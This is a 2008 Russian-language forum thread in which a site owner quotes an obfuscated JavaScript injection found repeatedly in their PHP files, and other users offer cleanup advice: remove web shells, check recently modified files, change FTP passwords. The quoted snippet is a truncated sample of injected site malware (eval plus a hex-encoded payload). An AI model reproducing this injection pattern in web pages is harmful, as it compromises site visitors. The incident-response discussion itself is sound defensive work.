Сломали (или заразили) сайт. Что это может быть?

Discussion in 'Безопасность и Анонимность' started by p@tison, 10 Nov 2008.

  1. p@tison

    p@tison New Member

    Joined:
    3 Nov 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Привет товарисчи кодеры и другие кибер-маньяки :)
    Всплыла проблемка у меня с сайтом. начал находить периодически в некоторых фаилах сайта (.php) вот такую вот строчку:
    Code:
    <div id='x0d65a24088ed1686437f1ee911ceeb9a0'><script>var jQuery = eval('w%i^nyd^ohw%.^e^v%ahly'.replace(/[\^s%yh]/g, '')); 
    jQuery('\x66\x75\x6e\x63\x74\x69......x25\x37\x31\x27\x29\x3b');</script></div>
    
    Пароль на хосте меняли. Дыры вроде все позакрывали. Что-бы это могло быть и как могло заразить?
    Заранее спасибо!
     
  2. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    497
    Likes Received:
    708
    Reputations:
    748
    Менять пароль на хосте я бы стал менять в посленюю очередь .. сначал шеллы чтоль повыдерал бы ... да файлы протрояненые
     
  3. p@tison

    p@tison New Member

    Joined:
    3 Nov 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    шеллы повыдерать - а это как, в двух словах? :)
    фаилы протрояненые - т.е. файлы в которых был найден этот код? а просто удаление кода не спасёт что-ли?
     
  4. none222

    none222 Guest

    Reputations:
    0
    Удли коды, поставь необходимые права на файлы, проверь комп на вирусы (и все админы пусть сделают тоже самое) и поменяй пароли на всё остальное (фтп...)
     
  5. iSeoBot

    iSeoBot Elder - Старейшина

    Joined:
    11 Apr 2008
    Messages:
    82
    Likes Received:
    67
    Reputations:
    13
    если олени ломали тебя,ищи файлы с недавним временем редактирования.которые ты не мог редачить в это время,их и копай! меня все пасы,живи щасливо :)
     
  6. p@tison

    p@tison New Member

    Joined:
    3 Nov 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Та код я удалял уже из фаилов. после чего закрыл дыры (найденые) и поменял пароль. Однако через какое-то время всё повторилось.
     
  7. schut123

    schut123 Elder - Старейшина

    Joined:
    2 Jan 2007
    Messages:
    73
    Likes Received:
    49
    Reputations:
    1
  8. iSeoBot

    iSeoBot Elder - Старейшина

    Joined:
    11 Apr 2008
    Messages:
    82
    Likes Received:
    67
    Reputations:
    13
    ищи файлы с недавним временем редактирования

    могли сломать через хостера,возможно там стоит бажное ядро
     
  9. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Была давно такая тема с сайтом. Если используешь Total Commander и ему подобные, то меняй пароль и не сохраняй его в проге... там все автоматом действует (етот вирус)
     
  10. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    а к логам доступа последнее время не предоставляют?
     
  11. Dimo4ka14

    Dimo4ka14 Elder - Старейшина

    Joined:
    23 Dec 2005
    Messages:
    282
    Likes Received:
    117
    Reputations:
    5
    фреимы поставили :)
     
    1 person likes this.